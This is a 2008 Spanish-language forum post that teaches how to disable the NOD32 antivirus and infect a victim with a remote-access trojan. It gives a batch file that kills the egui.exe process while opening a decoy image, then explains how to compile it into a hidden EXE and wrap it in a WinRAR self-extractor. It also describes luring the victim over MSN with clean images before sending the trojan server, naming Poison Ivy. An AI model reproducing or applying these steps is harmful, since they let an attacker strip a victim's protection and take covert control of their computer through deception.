Tema: Para dañinos→Matar al nod32 para meterle un troyano indetectable
Ver Mensaje Individual
  #1  
Antiguo 17-Apr-2008, 23:25
Avatar de riddick_grz
riddick_grz riddick_grz está desconectado
Cabo
Usuario
  
Mensajes: 48
1313 Para dañinos→Matar al nod32 para meterle un troyano indetectable
Para los curiosos que quieren saber como se mata, aqui dejo los bat que se usa para matar el nod, no falla,
a cada uno le dan click derecho editar y pues ahi ven como se hace.
Ya si los modifican a gusto, solo basta con hacerce
un instalable en exe para juntarlos todos y darles un orden.
aqui le dejo el bat.

LINK DE DESCARGA↓↓↓

RapidShare: 1-Click Webhosting

Ahora que si lo que quieren, solo es desactivar el NOD32 v3 para que le meten su troyano a la vctima, lo que hago en es un archivo bat que
nunca me ha fallado con lo siguiente:

taskkill /f /im egui.exe
y con eso se cierra

Ahora que si lo que quieres es pasarte a una victima,
1.- te bajas el Bat to Exe Converter de Aqui

LINK DE DESCARGA↓↓↓

RapidShare: 1-Click Webhosting


2.- ahora en un archivo batch (*.bat) en un documento de texto y lo guardas como *.bat y pones la siguiente linea

@echo off
start %myfiles%nombre de la imagen.jpg
taskkill /f /im egui.exe
exit

_____donde dice "nombre de la imagen" pongan el nombre de la imagen que le va a aparecer al ejecutar el archivo_____
3.- guardan el archivo con extensión *.bat

4.- Abren el Bat to EXE Converter

5.- ya abierto este programa es muy simple, empezamos agregando los archivos que contendra el exe, en donde dice batch file dan click en su boton y abren
el bat que creamos mas arriva.

6.- Ahora en donde dice Include tambien dan click en el boton y abren la imagen que asignaron en el archivo *.Bat

7.- dejan lo demas como esta y activan la casilla que dice ghost Application.

8.- le dan a Compile, y ya tiene el exe para desactivar al NOD.

Y diran, "" pero si este EXE no engaña a dadie"", ahora el truco es hacer un SFX con el Winrar y listo.

Ahora si, primero envias unas 2 imagenes a tu victima libres de virus para que se enganche.(Si es por el msn, a su bandeja de entrada, obiamente con otra cuenta).

Logicamente todas en rar para que no sospeche, una vez que ya pesco ahora si mandas tu SFX en rar tambien y cuando lo abra
va a abrir la imagen que adjuntaste y ni cuenta se va a dar que el nod32 esta cerrado, ahora si mandas tu Server.

En lo personal uso el de POISON, porque se aloja cuando no esta el nod, y luego aunque ejecuten el Nod de nuevo este no lo detecta ni lo borra.

La version de NOD32 que prove es la V3 con la firma de virus 2906 que es la mas reciente al dia 27 de FEBRERO del 2008-
Espero y sirva de algo, no explico los demas pasos porque se supone que para eso estan sus respectivos toques.

hasta la proxima chau suerte.


RIDDICK_GRZ
Responder Citando
Los siguientes 2 usuarios han agradecido riddick_grz por este post:
elias.1590 (17-Sep-2008), zadquiel (01-Oct-2009)
 

SEO by vBSEO 3.3.0